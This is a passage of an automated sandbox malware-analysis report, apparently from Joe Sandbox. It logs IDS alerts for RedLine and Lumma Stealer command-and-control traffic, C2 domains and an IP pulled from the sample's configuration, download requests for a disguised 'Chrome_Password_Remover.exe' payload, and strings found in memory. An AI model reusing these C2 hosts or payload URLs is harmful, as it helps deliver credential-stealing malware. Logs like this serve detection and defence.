                    Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.12:49710 -> 185.215.113.67:40960
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.12:49710 -> 185.215.113.67:40960
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 185.215.113.67:40960 -> 192.168.2.12:49710
                    Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 185.215.113.67:40960 -> 192.168.2.12:49710
                    Source: TrafficSnort IDS: 2053384 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (willingyhollowsk .shop) 192.168.2.12:58902 -> 1.1.1.1:53
                    Source: TrafficSnort IDS: 2054182 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (potterryisiw .shop) 192.168.2.12:63872 -> 1.1.1.1:53
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49736 -> 188.114.96.3:443
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49737 -> 188.114.96.3:443
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49738 -> 188.114.96.3:443
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49739 -> 188.114.96.3:443
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49740 -> 188.114.96.3:443
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49741 -> 188.114.96.3:443
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49742 -> 188.114.96.3:443
                    Source: TrafficSnort IDS: 2054183 ET TROJAN Observed Lumma Stealer Related Domain (potterryisiw .shop in TLS SNI) 192.168.2.12:49745 -> 188.114.96.3:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: pedestriankodwu.xyz
                    Source: Malware configuration extractorURLs: towerxxuytwi.xyz
                    Source: Malware configuration extractorURLs: ellaboratepwsz.xyz
                    Source: Malware configuration extractorURLs: penetratedpoopp.xyz
                    Source: Malware configuration extractorURLs: swellfrrgwwos.xyz
                    Source: Malware configuration extractorURLs: contintnetksows.shop
                    Source: Malware configuration extractorURLs: foodypannyjsud.shop
                    Source: Malware configuration extractorURLs: potterryisiw.shop
                    Source: Malware configuration extractorURLs: willingyhollowsk.shop
                    Source: Malware configuration extractorURLs: 185.215.113.67:40960
                    Source: global trafficTCP traffic: 192.168.2.12:49710 -> 185.215.113.67:40960
                    Source: global trafficHTTP traffic detected: GET /tanosx/clockbrix/downloads/Chrome_Password_Remover.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /443a209f-571f-419b-a313-2df7ae8bbefa/downloads/1a6d8155-b1f3-4621-9f17-89da4921df60/Chrome_Password_Remover.exe?response-content-disposition=attachment%3B%20filename%3D%22Chrome_Password_Remover.exe%22&AWSAccessKeyId=ASIA6KOSE3BND3U57RJW&Signature=luV%2FmWytJ4A8wh9TkqLQ1cRDVJ8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEgaCXVzLWVhc3QtMSJGMEQCIF0d%2F3b7L6xm4zKhRgvVPMVVzKwwpzi37CH%2BZK%2BIn0ZyAiBuyp8167XQoYPCv8%2FzuwivvWtFFMtk0%2FZgHtj3s4dd6yqnAggREAAaDDk4NDUyNTEwMTE0NiIMbeju1BPQLnRrYAjWKoQCjmSU9lQ%2F5yuuhuKx69xZT%2B%2FtlgjDBjDte46VYpmATd%2FsC5Zrcf%2Bm9f8r1H2oJb67RIKRFSFe7KeW88oU0Xa4YVu91FiLLREur8XVD79Biodab9hv%2FtWVZnaNWO2INMlv85%2FQJ46pMfZPc0rHJ2W4GnyVl%2BJbU6TVzyNY6PwF4F%2B7AcjZLoAn8YIq8IOxB8mYjZQUlQlvsoBzTeUgZzndc975%2B6vBLYVZkbVeJeQ952IK3JQIUOMlnrH%2BnQkkCZRCd8427Vq3HgSLewDmhRJNIzzbZMnyvNhw%2FUWfGxI7wphRhHqMBJRBkCDowsJDU86KfBt84kZAB%2FCW8OhYpl7%2BsyXf3rkwv7eutAY6ngELbJg3CTD%2Fk7eP6EnZldU0FrVs5%2Bvbi%2FfxapLmwJHR5gknJqQv7XoMPAV3lP%2BxX%2FjDeLci2YjgZFwhjP2AQRCJfIek5nzIh7IgIrvoRpB5TJ9eJmXRqfNfeB1Tazn%2FKTs1HF2FkZwLz44n8PswjipeM5CJC0ThqFfUv3SpkQ8SoiyeY7JGugAh%2F6NLQXFeWgq4b4yWTvnr35urTNDbJA%3D%3D&Expires=1720427207 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 185.215.113.67 185.215.113.67
                    Source: Joe Sandbox ViewIP Address: 185.215.113.67 185.215.113.67
                    Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                    Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: unknownHTTPS traffic detected: 173.222.162.60:443 -> 192.168.2.12:49730 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.67
                    Source: global trafficHTTP traffic detected: GET /tanosx/clockbrix/downloads/Chrome_Password_Remover.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /443a209f-571f-419b-a313-2df7ae8bbefa/downloads/1a6d8155-b1f3-4621-9f17-89da4921df60/Chrome_Password_Remover.exe?response-content-disposition=attachment%3B%20filename%3D%22Chrome_Password_Remover.exe%22&AWSAccessKeyId=ASIA6KOSE3BND3U57RJW&Signature=luV%2FmWytJ4A8wh9TkqLQ1cRDVJ8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEgaCXVzLWVhc3QtMSJGMEQCIF0d%2F3b7L6xm4zKhRgvVPMVVzKwwpzi37CH%2BZK%2BIn0ZyAiBuyp8167XQoYPCv8%2FzuwivvWtFFMtk0%2FZgHtj3s4dd6yqnAggREAAaDDk4NDUyNTEwMTE0NiIMbeju1BPQLnRrYAjWKoQCjmSU9lQ%2F5yuuhuKx69xZT%2B%2FtlgjDBjDte46VYpmATd%2FsC5Zrcf%2Bm9f8r1H2oJb67RIKRFSFe7KeW88oU0Xa4YVu91FiLLREur8XVD79Biodab9hv%2FtWVZnaNWO2INMlv85%2FQJ46pMfZPc0rHJ2W4GnyVl%2BJbU6TVzyNY6PwF4F%2B7AcjZLoAn8YIq8IOxB8mYjZQUlQlvsoBzTeUgZzndc975%2B6vBLYVZkbVeJeQ952IK3JQIUOMlnrH%2BnQkkCZRCd8427Vq3HgSLewDmhRJNIzzbZMnyvNhw%2FUWfGxI7wphRhHqMBJRBkCDowsJDU86KfBt84kZAB%2FCW8OhYpl7%2BsyXf3rkwv7eutAY6ngELbJg3CTD%2Fk7eP6EnZldU0FrVs5%2Bvbi%2FfxapLmwJHR5gknJqQv7XoMPAV3lP%2BxX%2FjDeLci2YjgZFwhjP2AQRCJfIek5nzIh7IgIrvoRpB5TJ9eJmXRqfNfeB1Tazn%2FKTs1HF2FkZwLz44n8PswjipeM5CJC0ThqFfUv3SpkQ8SoiyeY7JGugAh%2F6NLQXFeWgq4b4yWTvnr35urTNDbJA%3D%3D&Expires=1720427207 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1lLub HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iplogger.co/1lLubAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
                    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XfbLx43C7hcaUE4&MD=R3sXdF5e HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XfbLx43C7hcaUE4&MD=R3sXdF5e HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                    Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                    Source: global trafficDNS traffic detected: DNS query: iplogger.co
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: willingyhollowsk.shop
                    Source: global trafficDNS traffic detected: DNS query: potterryisiw.shop
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: potterryisiw.shop
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: BitLockerToGo.exe, 00000009.00000003.2748450943.00000000057EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2577922770.0000000000EE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.00000000030CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
